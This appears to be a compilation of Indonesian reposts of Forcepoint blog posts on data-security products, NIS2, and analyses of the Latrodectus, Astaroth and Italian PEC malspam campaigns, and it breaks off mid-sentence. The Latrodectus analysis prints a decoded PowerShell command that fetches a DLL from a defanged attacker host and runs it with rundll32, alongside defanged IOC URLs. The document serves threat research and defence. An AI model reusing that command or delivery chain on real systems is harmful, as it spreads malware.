Author: hadi s

Keamanan Data Tidak Terstruktur dengan DSPM Jalur Menuju Postur Keamanan yang Siap untuk Masa Depan Data tidak terstruktur adalah sumber daya penting sekaligus kerentanan besar. Seiring pertumbuhan data tidak terstruktur yang semakin meluas di berbagai lingkungan, perlindungannya menjadi semakin menantang. Solusi Data Security Posture Management (DSPM) memainkan peran penting dalam menyederhanakan keamanan data tidak terstruktur. Gartner’s 2024 Strategic Roadmap for World-Class Security of Unstructured Data mendorong para pemimpin keamanan senior untuk beralih menuju kondisi masa depan di mana data tidak terstruktur dapat dikendalikan, dilindungi, dan tetap patuh sepanjang siklus hidupnya. Solusi DSPM menawarkan pendekatan praktis dan visioner untuk menyederhanakan proses kompleks dalam mengamankan data tidak terstruktur. Pendekatan ini memungkinkan tim keamanan memperoleh visibilitas, otomatisasi, dan kemampuan pertahanan proaktif yang sesuai dengan lanskap risiko yang dinamis saat ini. Berikut cara DSPM mempercepat dan menyederhanakan jalan menuju keamanan data tidak terstruktur: Memberikan visibilitas terpadu dan komprehensif di seluruh sumber data Mencapai kondisi masa depan dimulai dari visibilitas. DSPM menyediakan pemetaan terpusat dan berkelanjutan terhadap data tidak terstruktur di semua repositori, termasuk lingkungan cloud, on-premises, dan penyimpanan hybrid. Pandangan menyeluruh mengenai lokasi data sensitif membantu tim keamanan mengurangi sprawl, memantau pergerakan data, dan mengidentifikasi kerentanan dengan cepat. Dengan visibilitas yang tersederhanakan, DSPM memberdayakan pemimpin keamanan dengan wawasan yang diperlukan untuk mempertahankan postur keamanan yang kuat dan mudah dikelola atas data tidak terstruktur. Mengotomatiskan klasifikasi data dan pelabelan sensitivitas Data tidak terstruktur lebih sulit untuk diklasifikasikan. Untuk menjawab tantangan ini, Forcepoint DSPM menggunakan otomatisasi berbasis AI (melalui AI Mesh) untuk memberikan pelabelan real-time yang akurat berdasarkan konten. Proses klasifikasi otomatis ini memastikan bahwa data sensitif terlindungi secara konsisten tanpa intervensi manual, sekaligus menyelaraskan klasifikasi dengan kebijakan internal dan standar regulasi. Tim keamanan kemudian dapat menerapkan kontrol granular pada data berlabel, meminimalkan risiko paparan tak sengaja atau ketidakpatuhan. Menyediakan wawasan risiko terkonsteks dan real-time Salah satu tujuan kondisi masa depan adalah keamanan proaktif berbasis risiko, yang dicapai DSPM melalui penyediaan wawasan kontekstual secara real-time. Alat seperti Risk-Adaptive Protection kami memperluas kemampuan ini dengan memberikan skor risiko berdasarkan perilaku pengguna, tren akses, dan faktor lingkungan, menyoroti pola akses atau aktivitas tidak biasa yang menyimpang dari norma. Hal ini memungkinkan pemimpin keamanan memprioritaskan respons berdasarkan dampak risiko, memastikan ancaman berprioritas tinggi ditangani dengan cepat. Menyederhanakan manajemen akses dan pemantauan izin Mengelola izin atas data tidak terstruktur adalah tantangan, terutama dalam lingkungan kolaboratif. DSPM menyediakan kontrol akses granular yang secara kontinu memindai dan memantau izin di seluruh repositori. Dengan kemampuan ini, tim keamanan dapat segera mengatasi permissions drift atau akses berisiko dan memastikan hanya pengguna berwenang yang dapat mengakses file sensitif. Wawasan real-time mengenai izin dan rekomendasi otomatis juga mengurangi ancaman orang dalam, memastikan kebijakan keamanan dapat beradaptasi seiring perubahan lingkungan. Mendorong kemampuan deteksi dan respons yang cepat Dengan cepatnya lanskap ancaman saat ini, kemampuan deteksi dan respons yang segera menjadi sangat penting. Fitur pemantauan real-time DSPM mendeteksi insiden saat terjadi, memungkinkan tim keamanan merespons dengan cepat. Ketika diintegrasikan dengan SIEM dan SOAR, DSPM dapat memicu peringatan saat mendeteksi anomali seperti akses file tanpa otorisasi, eksfiltrasi data, atau perilaku pengguna yang tidak biasa. Respons cepat dan otomatis ini selaras dengan penekanan kondisi masa depan pada ketahanan, meminimalkan kehilangan data dan mencegah eskalasi insiden. Menyederhanakan kepatuhan dan tata kelola Dengan peraturan seperti GDPR dan CCPA yang menegakkan perlindungan data ketat, DSPM menjadi kunci dalam menjaga kepatuhan. DSPM mengotomatisasi tugas tata kelola data, memetakan data sensitif ke persyaratan kepatuhan, dan menghasilkan jejak audit atas penanganan data. Penyederhanaan ini tidak hanya menghemat waktu dan biaya, tetapi juga memastikan kewajiban regulasi dipenuhi secara konsisten. Dengan menyelaraskan praktik keamanan dengan mandat regulasi, DSPM membantu organisasi mencapai postur keamanan yang patuh dan transparan dengan usaha manual minimal. Jalan Menuju Kondisi Masa Depan Dimulai dengan DSPM DSPM lebih dari sekadar alat—ini adalah aset kritis untuk keamanan data tidak terstruktur. Dengan menggabungkan visibilitas, otomatisasi, wawasan berbasis risiko, manajemen akses, respons cepat, dan dukungan kepatuhan, DSPM membangun pendekatan proaktif dan terukur untuk melindungi data tidak terstruktur. Pendekatan yang berorientasi masa depan ini mempersiapkan organisasi untuk beradaptasi dan berkembang dalam lingkungan data yang semakin kompleks, memungkinkan mereka menghadapi tantangan keamanan data tidak terstruktur dengan percaya diri. Jika organisasi Anda membutuhkan bantuan dalam perjalanan menuju keamanan data tidak terstruktur, bicaralah dengan salah satu pakar kami. Gartner, Inc. 2024 Strategic Roadmap for World-Class Security of Unstructured Data. Joerg Fritsch, 6 Mei 2024. GARTNER adalah merek dagang terdaftar dari Gartner, Inc. dan/atau afiliasinya di AS dan internasional dan digunakan di sini dengan izin. Semua hak dilindungi. Infrastruktur IT yang kuat adalah kunci produktivitas perusahaan. Dengan Forcepoint indonesia, merupakan bagian dari PT. iLogo Infralogy Indonesia, yang merupakan mitra terpercaya dalam solusi Infrastruktur IT dan Cybersecurity terbaik di Indonesia. Hubungi kami sekarang atau kunjungi Forcepoint.ilogoindonesia.id untuk informasi lebih lanjut!

Mitigasi Dua Risiko Terbesar Shadow IT dengan Keamanan Web Shadow IT adalah istilah untuk aplikasi dan layanan yang tidak secara resmi disetujui untuk digunakan dalam perusahaan, tetapi tetap digunakan oleh tim dan individu. Meskipun Shadow IT dapat menimbulkan risiko signifikan bagi semua organisasi, kita sebaiknya menghindari penerapan kebijakan yang terlalu ketat dan memaksa orang bekerja dengan cara yang sangat kaku serta menggunakan alat yang terbatas. Faktanya, sebagai pemimpin bisnis dan keamanan, kita bertanggung jawab untuk mengidentifikasi kompromi penggunaan berbagai alat dan layanan, lalu menyeimbangkannya dengan toleransi risiko organisasi. Dalam lingkungan dengan tingkat keamanan tinggi, mungkin saja kita memerlukan kebijakan akses yang sangat ketat untuk layanan web yang tidak disetujui, tetapi bagi sebagian besar organisasi, ada lebih banyak manfaat dari memungkinkan penggunaan berbagai layanan daring secara terkontrol. Jika demikian, pertanyaannya menjadi: apa cara paling efektif untuk menerapkan tingkat kontrol yang tepat guna mengurangi risiko terbesar dan memungkinkan alur kerja tetap lancar? Untuk menjawabnya, kita perlu memahami risiko yang muncul dari penggunaan Shadow IT, lalu kita bisa mengidentifikasi apakah kita sudah memiliki alat yang dapat membantu mengatasi risiko tersebut. Dua Risiko Keamanan Teratas dari Shadow IT Risiko terbesar bagi bisnis modern adalah pencurian data. Shadow IT dapat meningkatkan risiko pencurian data karena sumber daya web tersebut tidak dikelola oleh organisasi, sehingga hampir mustahil mengontrol jenis data apa yang disimpan atau diunduh dari aplikasi Shadow IT—yang juga dapat menyebabkan potensi paparan malware. Biaya bagi bisnis Anda dari risiko ini tidak hanya berupa denda finansial. Pelanggan dan mitra mengharapkan proses bisnis Anda aman; kegagalan dalam hal ini dapat mengikis kepercayaan terhadap bisnis Anda. Organisasi harus mengidentifikasi jenis data umum yang digunakan oleh berbagai kelompok dan menetapkan kebijakan mengenai jenis data apa yang boleh disimpan di aplikasi yang dikelola oleh TI versus yang diperbolehkan untuk digunakan dalam aplikasi Shadow IT. Mitigasi Risiko Keamanan Shadow IT dengan Secure Web Gateway Anda Kabar baiknya, sebagian besar organisasi memiliki solusi keamanan web, dan solusi ini biasanya dapat digunakan untuk menghasilkan laporan Shadow IT, yang menunjukkan berbagai aplikasi yang digunakan di seluruh perusahaan serta oleh pengguna dan kelompok mana. Salah satu fungsi utama dari jenis solusi keamanan web tertentu yang disebut Secure Web Gateway (SWG) adalah mendekripsi lalu lintas web dan memindai malware serta data sensitif sebelum mengenkripsi ulang dan meneruskan lalu lintas tersebut ke tujuannya. Jika organisasi Anda belum menggunakan SWG, mungkin ada baiknya mempertimbangkan kompromi dalam menggunakannya untuk membantu mengatasi risiko terbesar yang dihadapi setiap bisnis: pencurian data dan malware. Bicaralah dengan pakar hari ini untuk melihat bagaimana Forcepoint ONE Web Security dapat melindungi bisnis Anda sekaligus memungkinkan penggunaan Shadow IT secara terkontrol. Infrastruktur IT yang kuat adalah kunci produktivitas perusahaan. Dengan Forcepoint indonesia, merupakan bagian dari PT. iLogo Infralogy Indonesia, yang merupakan mitra terpercaya dalam solusi Infrastruktur IT dan Cybersecurity terbaik di Indonesia. Hubungi kami sekarang atau kunjungi Forcepoint.ilogoindonesia.id untuk informasi lebih lanjut!

AISPM: Konsep Keamanan Penting untuk 2025 Future Insights 2025 blog series, post #1 Catatan dari Lionel: Future Insights 2025 adalah seri blog di mana kami meminta para pemimpin keamanan senior kami untuk membagikan pandangan mereka tentang masa depan industri keamanan siber. Kami membuka seri 2025 dengan Jaimen Hoopes, GM Data Security & VP Product Management, membahas topik AI Security Posture Management (AISPM). Klik untuk membaca posting lainnya dalam seri ini. Keamanan data yang efektif membutuhkan lebih dari sekadar memasang langkah-langkah untuk mencegah eksfiltrasi informasi sensitif; hal ini juga menuntut pemahaman akurat tentang apa dan di mana data berada, serta membersihkan ROT (Redundant, Obsolete, and Trivial) data. Itulah sebabnya, selain kemampuan Data Loss Prevention (DLP) kami yang terkenal, Forcepoint menawarkan solusi Data Security Posture Management (DSPM). Pendekatan ini bersifat proaktif, dengan menemukan, mengklasifikasikan dan mengatur data, serta menggunakan otomatisasi untuk mendeteksi faktor risiko baru dengan cepat. Dalam lanskap teknologi yang berkembang pesat saat ini, kecerdasan buatan (AI) telah menjadi komponen penting dalam berbagai operasi perusahaan. Dari meningkatkan pengalaman pelanggan hingga menyederhanakan proses internal, alat AI mendorong kemajuan signifikan di berbagai industri. Namun, dengan kekuatan besar hadir pula tanggung jawab besar, dan penting bagi bisnis untuk memahami risiko terkait AI serta bagaimana mengelolanya secara efektif. Di sinilah AI Security Posture Management (AISPM) berperan. Pentingnya Memahami Risiko AI Sistem AI, meski transformatif, memperkenalkan serangkaian risiko yang berbeda dari ancaman TI tradisional. Risiko ini dapat menimbulkan dampak besar bagi perusahaan, mulai dari pelanggaran data hingga gangguan operasional. Memahami risiko ini sangat penting untuk melindungi aset, reputasi, dan fungsi organisasi Anda secara keseluruhan. Privasi dan Keamanan Data: AI sering membutuhkan data dalam jumlah besar agar dapat berfungsi secara efektif. Data ini dapat mencakup informasi sensitif, dan pelanggaran atau penyalahgunaannya dapat menimbulkan pelanggaran privasi serius serta konsekuensi hukum. Kerentanan Model: Model AI tidak kebal terhadap serangan. Serangan adversarial, di mana pelaku jahat memanipulasi input untuk menipu sistem AI, dapat menghasilkan output atau keputusan yang salah dan merugikan. Bias dan Keadilan: AI dapat secara tidak sengaja mempertahankan atau memperbesar bias yang ada dalam data pelatihan, mengakibatkan perlakuan tidak adil terhadap individu atau kelompok tertentu, serta menimbulkan masalah etika dan hukum. Risiko Operasional: AI dapat mengalami malfungsi atau menghasilkan output tak terduga karena cacat model atau perubahan pola data, yang dapat mengganggu operasi bisnis. Apa itu AISPM, dan apa yang dapat Anda lakukan dengannya? Jika CSPM berfokus pada infrastruktur cloud dan DSPM mencakup data di seluruh siklus hidupnya, maka AISPM berfokus pada keamanan sistem AI dan Machine Learning (ML) di manapun sistem tersebut digunakan dalam organisasi Anda. AISPM dirancang untuk menangani kerentanan yang terkait dengan sistem AI dan bagaimana sistem tersebut berinteraksi dengan data serta infrastruktur. Kemampuan utama AISPM yang dapat digunakan untuk menyelesaikan masalah keamanan AI meliputi: AI Discovery: Memberikan visibilitas mengenai alat AI yang digunakan, termasuk shadow AI. Mulailah dengan asesmen menyeluruh terhadap alat AI yang digunakan dan risiko terkait. Gunakan alat yang dapat mendeteksi AI yang digunakan tanpa persetujuan resmi organisasi. Misconfiguration Detection: Menemukan layanan AI yang salah konfigurasi dan menerapkan aturan konfigurasi yang benar. Data Governance: Memastikan data untuk pelatihan maupun operasional aman, akurat, dan sesuai regulasi. Termasuk enkripsi, kontrol akses, dan audit rutin. Attack Path Remediation: Mengidentifikasi dan menghilangkan kerentanan serta mencegah pencampuran data sensitif dengan data pelatihan. Compliance Enforcement: Menjamin seluruh penggunaan AI sesuai persyaratan regulasi, mulai dari konfigurasi hingga pelaporan. Monitoring Berkelanjutan: Keamanan AI bukan tugas sekali selesai. Sistem harus dipantau terus-menerus untuk ancaman dan kerentanan baru. Seiring meningkatnya popularitas AISPM sebagai kategori solusi—yang saya yakini akan terus berkembang—kita mungkin akan melihat serangkaian kemampuan standar yang harus dimiliki setiap penyedia AISPM. Apa yang membuat Forcepoint menjadi pemain utama dalam AISPM? Forcepoint berada dalam posisi kuat untuk memimpin diskusi AISPM berkat spesialisasi kami dalam keamanan data yang sejak awal sudah berfokus pada ancaman generatif AI. Model AI Mesh yang saat ini menggerakkan klasifikasi untuk solusi DSPM kami dapat meningkatkan akurasi identifikasi data sensitif dan melindunginya dari eksfiltrasi melalui sistem AI. Dalam video di bawah, saya memberikan gambaran tentang apa yang membedakan AI Mesh dan membuatnya transparan serta efisien. Inti dari performanya adalah Small Language Model (SLM) generatif, yang membutuhkan daya komputasi jauh lebih kecil sehingga lebih cepat dan mudah dikustomisasi dibandingkan LLM. Strategi proaktif untuk mengklasifikasikan dan mengatur data sebelum berinteraksi dengan sistem AI paling baik dilengkapi dengan DLP yang dapat memblokir informasi sensitif agar tidak dimasukkan ke alat AI. Keamanan AI organisasi dapat ditingkatkan lebih jauh dengan Risk-Adaptive Protection untuk menganalisis perilaku pengguna dan menyesuaikan tingkat akses secara otomatis, real-time. Penggunaan alat-alat ini secara kombinasi menghasilkan pendekatan Data Security Everywhere, strategi efektif untuk mengamankan data penting dan menjaga keamanan penggunaan AI generatif. AISPM Menetapkan Standar Baru dalam Keamanan Proaktif Banyak pekerjaan untuk mencegah pelanggaran data bukan tentang menghadapi ancaman canggih; tetapi tentang tetap waspada terhadap hal-hal kecil. Misalnya, jika Anda berlangganan solusi AI perusahaan untuk membantu tugas tertentu, bagaimana memastikan bahwa karyawan hanya menggunakan solusi tersebut dan bukan versi publik yang lebih mudah diakses tetapi kurang aman? Bagaimana mencegah file berisi informasi strategis rahasia tersimpan di folder branding yang akan Anda gunakan untuk alat penulisan AI? Seiring AI terus mengubah lanskap perusahaan, memahami dan mengelola posture keamanan alat AI sangat penting untuk melindungi bisnis Anda dari potensi risiko. Dengan pendekatan proaktif dan komprehensif terhadap AI Security Posture Management, Anda dapat melindungi data, menjaga integritas operasional, serta menegakkan standar etika. Dengan demikian, Anda tidak hanya meningkatkan keamanan sistem AI tetapi juga memperkuat kepercayaan para pemangku kepentingan. Berinvestasi dalam AISPM bukan hanya tentang mengurangi risiko—tetapi memastikan inisiatif AI Anda memberikan dampak positif bagi bisnis dalam kerangka kerja yang aman dan etis. Sambut masa depan AI dengan percaya diri, mengetahui bahwa Anda memiliki alat dan strategi untuk mengelola keamanannya secara efektif. —— Infrastruktur IT yang kuat adalah kunci produktivitas perusahaan. Dengan Forcepoint indonesia, merupakan bagian dari PT. iLogo Infralogy Indonesia, yang merupakan mitra terpercaya dalam solusi Infrastruktur IT dan Cybersecurity terbaik di Indonesia. Hubungi kami sekarang atau kunjungi Forcepoint.ilogoindonesia.id untuk informasi lebih lanjut !

Di Balik Kampanye Malware Latrodectus Phishing klasik bertemu teknik distribusi payload inovatif Laporan ini memberikan analisis mendalam mengenai aktivitas kampanye Latrodectus terbaru yang ditemukan oleh tim riset X-Labs kami. Salah satu teknik penyebaran utama Latrodectus melibatkan email phishing, memanfaatkan infrastruktur seperti milik IcedID. Latrodectus terutama menargetkan sektor keuangan, otomotif, dan layanan kesehatan. Dengan membajak akun email dan mendistribusikan lampiran berbahaya, malware ini menyebar ke jaringan target yang lebih luas. Saat ini, pelaku ancaman semakin banyak mengadopsi Latrodectus, memanfaatkan format lampiran umum seperti HTML dan PDF. Malware ini dirancang untuk bersifat tersembunyi dan persisten, sehingga menyulitkan upaya deteksi dan pembersihan. Hal ini dapat menyebabkan pencurian data pribadi, kerugian finansial akibat penipuan atau pemerasan, serta kompromi informasi sensitif. Kampanye Latrodectus dimulai dari serangan yang berasal dari email terkompromi yang tampak berisi dokumen DocuSign penting. Pengguna diarahkan untuk membuka dokumen melalui tautan yang diberikan. Ketika diklik, tautan tersebut mengarahkan pengguna ke URL berbahaya yang secara tidak sengaja mengunduh payload tahap berikutnya. Fig. 1 – Rantai serangan Fig. 2 – Akses awal PDF Fig. 3 – URL mencurigakan dalam PDF PDF mengandung domain terkompromi dengan redirection: “hxxps://delview[.]com/MobileDefault[.]aspx?reff=hxxps://cutt[.]ly/seU8MT6t#_fZ0NmW” Tautan tersebut mengarah ke URL shortener menuju domain mencurigakan lain: “hxxps://digitalpinnaclepub[.]com/?3” dan akhirnya mengarah ke project “storage.googleapis.com” untuk mengunduh JavaScript ter-obfuscate: “hxxps://storage[.]googleapis[.]com/braided-turbine-435813-n7[.]appspot[.]com/VA8PBxartt/Document-20-17-57.js” Analisis JavaScript Ter-obfuscasi JavaScript berisi banyak pesan sampah dalam “//” untuk meningkatkan obfuscation dan ukuran file. Kode JavaScript berbahaya sebenarnya dikomentari dalam “////”. Fig. 4 – Payload JavaScript ter-obfuscasi Setelah menghapus pesan sampah, tampak manipulasi string menggunakan fungsi replace dan join. Mengganti “////” dengan spasi (“ ”) menunjukkan kode berbahaya yang sebenarnya. Fig. 5 – Fungsi manipulasi string JavaScript yang telah dideobfuscate Setelah dideobfuscate, skrip membuat objek ActiveXObject(“WindowsInstaller.Installer”) dan mengunduh file installer .msi. Fig. 6 – Kode JavaScript ter-deobfuscate mengunduh file MSI Analisis MSI File MSI dijalankan melalui JavaScript dan mengekstrak file .dll 64-bit berbahaya ke %appdata%. MSI juga mengeksekusi .dll menggunakan rundll32.exe dengan parameter fungsi ekspor. Fig. 7 – File MSI File .dll yang dijatuhkan memiliki fungsi ekspor “GetDeepDVCState” dan MSI menjalankan .dll tersebut dengan parameter: “/DontWait C:/Windows/SysWOW64/rundll32.exe C:\Users\Admin\AppData\Roaming\vierm_soft_x64.dll, GetDeepDVCState” Analisis DLL DLL adalah binary Microsoft Visual C++ 64-bit dengan informasi versi palsu yang seolah dari NVIDIA: Fig. 8 – Informasi versi DLL DLL ini kemudian mengekstrak payload DLL tahap selanjutnya ke memori: Fig. 9 – Informasi versi DLL DLL hasil unpack terhubung ke server C2 berbahaya pada port tidak umum 8041: Greshunka[.]com:8041/bazar.php Akses Awal melalui HTML File HTML phishing menampilkan pop-up yang menyerupai dokumen Word kepada pengguna. Mengklik tombol menjalankan kode JavaScript berbahaya dalam HTML. Fig. 10 – Lampiran HTML HTML berisi pesan peringatan yang terbalik: Your browser does not support correct offline display of this document. Please follow the instructions below using the HTML menggunakan encoding string seperti window.atob() dan fungsi obfuscation seperti s.split(“”).reverse().join(“”); Fig. 11 – Kode mencurigakan dalam HTML Kode base64 yang telah didekodekan: cmd /c start /min powershell $path=’%appdata%\witwin_st_x64.dll’; iwr hxxp://gertioma[.]top/o.jpg -outfile $path; start-process rundll32 $path,NxReleasePMap8== Ini menunjukkan bahwa pelaku ancaman menggunakan HTML untuk mengeksekusi PowerShell, mengunduh payload DLL secara langsung tanpa MSI, dan menjalankannya dengan rundll32.exe untuk terhubung ke C2. Kami telah mengamati beberapa kampanye dengan lampiran HTML dalam email terkompromi. Kesimpulan Pelaku ancaman terus menggunakan email lama untuk menargetkan pengguna melalui lampiran PDF atau HTML mencurigakan. Mereka menggunakan metode redirection dengan URL shortener dan meng-host payload berbahaya pada project storage[.]googleapis[.]com yang dikenal luas. Lalu mengunduh JavaScript ter-obfuscasi untuk mengunduh MSI dan menggunakan rundll32.exe untuk menjalankan DLL 64-bit. Kampanye ini menggabungkan metode lama dan baru. Latrodectus memanfaatkan infrastruktur lama dikombinasikan dengan metode distribusi payload yang inovatif untuk menargetkan sektor keuangan, otomotif, dan bisnis. Pernyataan Perlindungan Pelanggan Forcepoint terlindungi terhadap ancaman ini pada tahap-tahap berikut: Tahap 2 (Umpan): PDF dan HTML berbahaya diblokir. Tahap 3 (Redirect): URL shortened dan domain terkompromi diblokir. Tahap 5 (Dropper File): File dropper dimasukkan ke database berbahaya Forcepoint dan diblokir. Tahap 6 (Call Home): Kredensial C2 diblokir. IOC URL Tahap Awal: (semua URL tetap dalam format hxxp untuk keamanan) hxxps://delview[.]com/MobileDefault.aspx?reff=… hxxps://cutt[.]ly/seU8MT6t#_fZ0NmW hxxps://digitalpinnaclepub[.]com/?3 hxxps://storage.googleapis.com/braided-turbine-435813-n7.appspot.com/… hxxp://194[.]54[.]156[.]91/dsa.msi hxxp://gertioma[.]top/o.jpg Server C2: tiguanin[.]com greshunka[.]com bazarunet[.]com mazinom[.]com leroboy[.]com krinzhodom[.]com klemanzino[.]net rilomenifis[.]com isomicrotich[.]com Hash: 35A990C3BE798108C9D12A47F4A028468EA6095B 9361621490915EBB919B79C6101874F03E4E51BC 71E99A21FFA29E1E391811F5A3D04DCBB9CF0949 570c4ab78cf4bb22b78aac215a4a79189d4fa9ed 62e23500cc5368e37be47371342784f72e481647 881993bcb37aa9504249271b7559addc0c633f09 7474873629399ee5fdd984c99b705e0490ab8707 Infrastruktur IT yang kuat adalah kunci produktivitas perusahaan. Dengan Forcepoint indonesia, merupakan bagian dari PT. iLogo Infralogy Indonesia, yang merupakan mitra terpercaya dalam solusi Infrastruktur IT dan Cybersecurity terbaik di Indonesia. Hubungi kami sekarang atau kunjungi Forcepoint.ilogoindonesia.id untuk informasi lebih lanjut!  

Apakah Organisasi Anda Siap untuk NIS2? Batas waktu bagi negara-negara anggota untuk mengadopsi NIS2 ke dalam hukum nasional adalah 17 Oktober. Jika Anda berada di salah satu negara anggota Uni Eropa (UE), atau jika Anda adalah pemasok bagi organisasi yang berbisnis di negara-negara tersebut, kemungkinan besar organisasi Anda sudah mulai memikirkan soal kepatuhan terhadap NIS2. Berikut tiga hal yang perlu dipertimbangkan: NIS2 memperluas persyaratan dan berlaku untuk lebih banyak organisasi NIS2 dibangun di atas banyak persyaratan yang telah diterapkan oleh NIS1. Meskipun NIS1 telah berkontribusi besar dalam meningkatkan tingkat keamanan di seluruh UE, NIS2 menambah lebih banyak persyaratan. Yang lebih penting, NIS2 memperluas cakupan kewajiban kepada lebih banyak perusahaan di luar industri yang diatur dan infrastruktur kritis—diperkirakan NIS2 berlaku untuk 160 ribu lebih banyak organisasi dibandingkan NIS1. NIS2 memperluas akuntabilitas hingga ke tingkat eksekutif NIS2 juga berkaitan dengan perluasan akuntabilitas di dalam organisasi yang termasuk dalam cakupannya. Dengan NIS2, kepatuhan dan kesiapan siber tidak lagi hanya menjadi tanggung jawab departemen IT dan keamanan. NIS2 mengharuskan eksekutif senior bahkan anggota dewan untuk menyetujui persyaratan kepatuhan dan juga tanggapan risiko ketika terjadi pelanggaran. NIS2 menyoroti pentingnya pemulihan insiden Di dunia digital saat ini, semua perusahaan memiliki kepentingan dalam mengamankan bisnis mereka. Namun ketika pelanggaran terjadi, NIS2 mewajibkan organisasi untuk memiliki prosedur manajemen insiden agar dapat mendeteksi, merespons, dan pulih dari insiden siber secara cepat dan efektif. Dalam hal ini, kepatuhan NIS2 dapat mendorong organisasi terkait untuk meninjau dan memperbarui protokol keberlangsungan bisnis yang sudah ada. Menjaga keamanan data adalah inti dari apa yang kami lakukan di Forcepoint. Jika Anda ingin memahami lebih lanjut pendekatan kami terhadap privasi dan keamanan data, saya mengundang Anda untuk mengunjungi Forcepoint Trust Hub. Jangan ragu untuk menghubungi kami jika Anda siap berbicara dengan ahli keamanan data. Sumber Daya Tambahan NIS2 Halaman resmi Directive NIS2 FAQ resmi Directive NIS2 Seri NIS2 (bagian 1): Apa itu NIS2? Seri NIS2 (bagian 2): Peran Manajemen Risiko Seri NIS2 (bagian 3): Manajemen Insiden yang Efektif Seri NIS2 (bagian 4): Kesadaran Keamanan Informasi Infrastruktur IT yang kuat adalah kunci produktivitas perusahaan. Dengan forcepoint indonesia, merupakan bagian dari PT. iLogo Infralogy Indonesia, yang merupakan mitra terpercaya dalam solusi Infrastruktur IT dan Cybersecurity terbaik di Indonesia. Hubungi kami sekarang atau kunjungi forcepoint.ilogoindonesia.id untuk informasi lebih lanjut!

Astaroth Trojan Menyerang Brasil dan Meksiko melalui Secureserver.net Catatan dari Lionel: Akhir pekan lalu, para peneliti X-Labs kami melihat peningkatan aktivitas terkait trojan perbankan Astaroth yang dikirim melalui URL secureserver[.]net. Ini adalah platform yang telah dilacak oleh Prashant sejak postingannya tentang secureserver[.]net pada bulan Juli. Saat kami menyelesaikan analisis Prashant, kami menyadari bahwa peneliti dari Trend Micro telah memublikasikan penelitian mereka sendiri tentang Astaroth. Demi berbagi informasi lebih luas, kami tetap memutuskan untuk menerbitkan tulisan ini. Ringkasan Sejak postingan Unseen Dangers saya sebelumnya tentang malware yang dikirim melalui URL berbasis secureserver[.]net, serangan masih berlanjut namun dengan teknik yang berbeda kali ini. Berikut adalah rantai serangannya: EML → URL (evasi) → ZIP → LNK → MSHTA → JS ter-obfuscate → C2 Kampanye ini terutama berdampak pada wilayah Amerika Selatan, terutama Brasil dan Meksiko. Industri yang paling terdampak adalah Bisnis & Ekonomi, Perjalanan, Belanja, dan lembaga Pemerintah. Isi Email & Distribusi Malware Email berisi tautan secureserver[.]net yang meng-host file berbahaya. Saat URL dibuka, itu mengunduh file arsip. Tautan secureserver[.]net bersifat evasif dan bekerja di wilayah Brasil. Jika kita melihat bagian HTML email, jelas bahwa bahasa yang digunakan adalah “pt-BR”, yang memberi petunjuk bahwa URL tersebut ditargetkan untuk wilayah Amerika Selatan. Arsip ZIP tersebut berisi file .lnk yang menggunakan cmd.exe untuk menjalankan mshta. Lalu mshta menjalankan JavaScript untuk aktivitas lanjutan. Penjelasan komponen: cmd.exe – interpreter command line /V – digunakan untuk menghindari potensi konflik atau deteksi /c – menjalankan perintah berikutnya mshta.exe – program resmi Microsoft untuk menjalankan file HTA, namun sering disalahgunakan untuk mengeksekusi kode berbahaya Kode JS dalam file tersebut di-obfuscate menggunakan campuran heksadesimal dan oktal. Hasil Deobfuscation Setelah di-deobfuscate, kodenya mengarah pada sebuah URL dan beberapa konten tambahan. Kode tersebut memiliki dua komponen utama: Variabel array berisi dua string (7 karakter acak & URL) Metode GetObject Cara kerja: Metode GetObject digunakan untuk mengeksekusi URL menggunakan nama metode acak 7 karakter (VDZLQHG dalam contoh). Jika koneksi berhasil, malware menghubungi server C2 dan mengirimkan data sensitif dari sistem. Jika gagal, proses dihentikan secara diam-diam dan diarahkan ke situs bersih seperti Facebook, Twitter, LinkedIn. Jika berhasil terhubung, host C2 tersebut adalah bagian dari trojan perbankan Astaroth. Hostname tampak dihasilkan secara acak menggunakan Domain Generation Algorithm (DGA). Se sejauh analisis dilakukan, belum ditemukan payload berbahaya tambahan. Pernyataan Proteksi Pelanggan Forcepoint terlindungi di tahap berikut: Tahap 2 (Lure) – Email & URL berbahaya diblokir oleh analitik email/web dan Real Time Security Analytics. Tahap 3 (Redirect) – Pengalihan berbahaya diklasifikasi dan diblokir. Tahap 5 (Dropper File) – File dropper ditambahkan ke database Forcepoint dan diblokir. Tahap 6 (Call Home) – Koneksi C2 yang mencoba mencuri data pengguna dikategorikan sebagai berbahaya dan diblokir. Daftar IOC (Indicators of Compromise) Pola URL Delivery hxxps://222.183.62[.]50.host.secureserver.net Hash ZIP 1368b8d0a6e4c511e17080032b183133e920bc2f e92fcd723d12b6e9533e8cbb9bab374037184fe1 efffe10b78e1eab853dd6e91bbec52b24e331af2 Hash LNK 4c691442ae0af56d8559475f73a3482a38394626 a835e5d99b11339056bc36cbb41d950525a5aaa5 7957de4e33259045d7da94905203ad7f1432141c URL C2 hxxps://tiasr[.]olafdisney.sbs/?5/ hxxps://screranvel[.]safezipdirect.associates/?2/ hxxps://planbenpunwel2[.]smartconsultoria.quest/?2/ Infrastruktur IT yang kuat adalah kunci produktivitas perusahaan. Dengan forcepoint indonesia, merupakan bagian dari PT. iLogo Infralogy Indonesia, yang merupakan mitra terpercaya dalam solusi Infrastruktur IT dan Cybersecurity terbaik di Indonesia. Hubungi kami sekarang atau kunjungi forcepoint.ilogoindonesia.id untuk informasi lebih lanjut!

Pada awal Oktober, tim riset X-Labs mengidentifikasi kampanye malspam yang menargetkan bisnis dan individu di Italia melalui PEC (Posta Elettronica Certificata)—sistem email bersertifikat yang sangat dipercaya di Italia. Karena sifatnya yang resmi dan aman, PEC sering disalahgunakan untuk menyebarkan malware. Dalam kampanye ini, email berisi ancaman hukum palsu dan mengarahkan korban ke sebuah tautan yang mengunduh file JavaScript berbahaya. Analisis JavaScript File JavaScript (_Fattura_38377668.js) sangat ter-obfuscate. Terdapat tiga fungsi utama: honour_march_0thehas() Menyimpan array string yang telah di-encode/obfuscate. honour_march_0wasbut(thehas, wasbut) Mengambil array dari fungsi pertama, lalu menjalankan proses: decoding Base64 kustom decoding XOR URL decoding mengembalikan string ter-decode hvngqasq(zfutxpog) Mengubah string heksadesimal menjadi array angka. Nilai yang dihasilkan oleh dua array hex kemudian di-XOR dan diubah menjadi string untuk menghasilkan payload PowerShell. Payload PowerShell Proses decoding menghasilkan skrip PowerShell yang: 1. Membuat alias untuk curl new-alias press curl 2. Membangkitkan URL unduhan berbahaya URL hasil decoding: gizpvovur.top/1.php?s=mints13 3. Menjalankan perintah menggunakan Invoke-Expression (iex) Skrip 